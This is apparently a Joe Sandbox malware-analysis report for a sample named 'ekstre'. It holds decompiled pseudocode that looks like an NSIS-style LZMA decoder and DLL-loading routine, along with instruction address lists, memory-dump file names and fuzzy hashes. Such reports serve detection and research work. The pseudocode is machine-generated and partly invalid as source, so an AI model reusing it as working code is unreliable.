													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00407068
0x00407068
0x0040706c
0x00407095
0x0040709f
0x0040706e
0x00407077
0x00407084
0x00407087
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x004073cb
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD167A Relevance: 4.6, APIs: 3, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6DDD167A(void* __ebx, void* __edx, void* __edi, void* __esi) {
				void* _t37;
				intOrPtr _t43;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t55;
				void* _t56;
				signed char _t62;
				signed int _t64;
				signed int _t66;
				struct HINSTANCE__* _t71;
				void* _t72;
				void* _t80;
				void* _t84;
				void* _t85;
				void* _t87;

				_t80 = __esi;
				_t72 = __edi;
				_t55 = __ebx;
				 *0x6ddd5040 =  *((intOrPtr*)(_t87 + 8));
				 *0x6ddd503c =  *((intOrPtr*)(_t87 + 0x94));
				 *0x6ddd5038 =  *((intOrPtr*)(_t87 + 0x90));
				 *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x9c)) + 0xc))( *0x6ddd5014, E6DDD132B, _t84);
				_push("true");
				_t37 = E6DDD2351();
				_t85 = _t37;
				if(_t85 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t85 + 4)) != 1) {
						E6DDD1FCB(_t85);
					}
					E6DDD2049(_t85);
					if( *((intOrPtr*)(_t85 + 4)) == 0xffffffff) {
						L14:
						if(( *(_t85 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t85 + 4)) == 0) {
								_t37 = E6DDD2209(_t85);
							} else {
								_push(_t55);
								_push(_t80);
								_push(_t72);
								_t64 = 8;
								_t14 = _t85 + 0x1018; // 0x1018
								_t56 = _t14;
								memcpy(_t87 + 0x14, _t56, _t64 << 2);
								_t43 = E6DDD1F1E(_t85, _t87 + 0x30);
								 *(_t85 + 0x1034) =  *(_t85 + 0x1034) & 0x00000000;
								 *((intOrPtr*)(_t85 + 0x1020)) = _t43;
								 *_t56 = 4;
								E6DDD2209(_t85);
								_t66 = 8;
								_t37 = memcpy(_t56, _t87 + 0x28, _t66 << 2);
							}
						} else {
							E6DDD2209(_t85);
							_t37 = GlobalFree(E6DDD15EB(E6DDD1668(_t85)));
						}
						if( *((intOrPtr*)(_t85 + 4)) != 1) {
							E6DDD200D(_t85);
							_t62 =  *(_t85 + 0x1010);
							_t37 = _t62;
							if((_t62 & 0x00000040) != 0 &&  *_t85 == 1) {
								_t71 =  *(_t85 + 0x1008);
								if(_t71 != 0) {
									FreeLibrary(_t71);
									_t37 =  *(_t85 + 0x1010);
								}
							}
							if((_t37 & 0x00000020) != 0) {
								_t37 = E6DDD15C5( *0x6ddd502c);
							}
						}
						if(( *(_t85 + 0x1010) & 0x00000002) == 0) {
							_t37 = GlobalFree(_t85);
						}
						goto L28;
					}
					_t49 =  *_t85;
					if(_t49 == 0) {
						if( *((intOrPtr*)(_t85 + 4)) != 1) {
							goto L14;
						}
						E6DDD2F9F(_t85);
						L12:
						_t85 = _t49;
						L13:
						goto L14;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						L8:
						_t49 = E6DDD2D14(_t85); // executed
						goto L12;
					}
					_t51 = _t50 - 1;
					if(_t51 == 0) {
						_push(_t85);
						E6DDD17F7();
						goto L13;
					}
					if(_t51 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x6ddd167a
0x6ddd167a
0x6ddd167a
0x6ddd1684
0x6ddd1690
0x6ddd169d
0x6ddd16b4
0x6ddd16b7
0x6ddd16b9
0x6ddd16be
0x6ddd16c3
0x6ddd17ef
0x6ddd17f6
0x6ddd16c9
0x6ddd16cd
0x6ddd16d0
0x6ddd16d5
0x6ddd16d7
0x6ddd16e1
0x6ddd1719
0x6ddd1720
0x6ddd1744
0x6ddd1792
0x6ddd1746
0x6ddd1746
0x6ddd1747
0x6ddd1748
0x6ddd174b
0x6ddd1750
0x6ddd1750
0x6ddd175d
0x6ddd1760
0x6ddd1765
0x6ddd176d
0x6ddd1773
0x6ddd1779
0x6ddd1789
0x6ddd178a
0x6ddd178e
0x6ddd1722
0x6ddd1723
0x6ddd1738
0x6ddd1738
0x6ddd179c
0x6ddd179f
0x6ddd17a5
0x6ddd17ab
0x6ddd17b0
0x6ddd17b8
0x6ddd17c0
0x6ddd17c3
0x6ddd17c9
0x6ddd17c9
0x6ddd17c0
0x6ddd17d1
0x6ddd17d9
0x6ddd17de
0x6ddd17d1
0x6ddd17e6
0x6ddd17e9
0x6ddd17e9
0x00000000
0x6ddd17e6
0x6ddd16e6
0x6ddd16e9
0x6ddd170e
0x00000000
0x00000000
0x6ddd1711
0x6ddd1716
0x6ddd1716
0x6ddd1718
0x00000000
0x6ddd1718
0x6ddd16eb
0x6ddd16ee
0x6ddd16fa
0x6ddd16fb
0x00000000
0x6ddd16fb
0x6ddd16f0
0x6ddd16f3
0x6ddd1702
0x6ddd1703
0x00000000
0x6ddd1703
0x6ddd16f8
0x00000000
0x00000000
0x00000000
0x6ddd16f8

APIs

Part of subcall function 6DDD2351: GlobalFree.KERNEL32(?), ref: 6DDD2A44
Part of subcall function 6DDD2351: GlobalFree.KERNEL32(?), ref: 6DDD2A4A
Part of subcall function 6DDD2351: GlobalFree.KERNEL32(?), ref: 6DDD2A50

GlobalFree.KERNEL32(00000000), ref: 6DDD1738
FreeLibrary.KERNEL32(?), ref: 6DDD17C3
GlobalFree.KERNEL32(00000000), ref: 6DDD17E9

Part of subcall function 6DDD1FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 6DDD1FFA

Part of subcall function 6DDD17F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,6DDD1708,00000000), ref: 6DDD189A

Part of subcall function 6DDD1F1E: wsprintfW.USER32 ref: 6DDD1F51

Memory Dump Source

Source File: 00000000.00000002.1347263504.000000006DDD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DDD0000, based on PE: true

Associated: 00000000.00000002.1347232243.000000006DDD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347305831.000000006DDD4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1347348567.000000006DDD6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ddd0000_ekstre.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-0
Opcode ID: 7e6e915169ab561e2235b537db845bd3eb695c8240b3fd1a30e79e630eb10f3d
Instruction ID: aa5f423b930096d773824bb83620127fb37fbb9067bb50528fc14957b6ccf36e
Opcode Fuzzy Hash: 7e6e915169ab561e2235b537db845bd3eb695c8240b3fd1a30e79e630eb10f3d
Instruction Fuzzy Hash: 5A41C23144824AFFDFB0BF68C844BFA37B8FB11319F004019FA589A196DB749588C760

Uniqueness

Uniqueness Score: -1.00%

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x470320");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x4702e8 =  *0x4702e8 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6("true");
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406AA4(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E004056CA(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x2000, _t37, 0x41e658, 0x40a000);
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403CB7( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
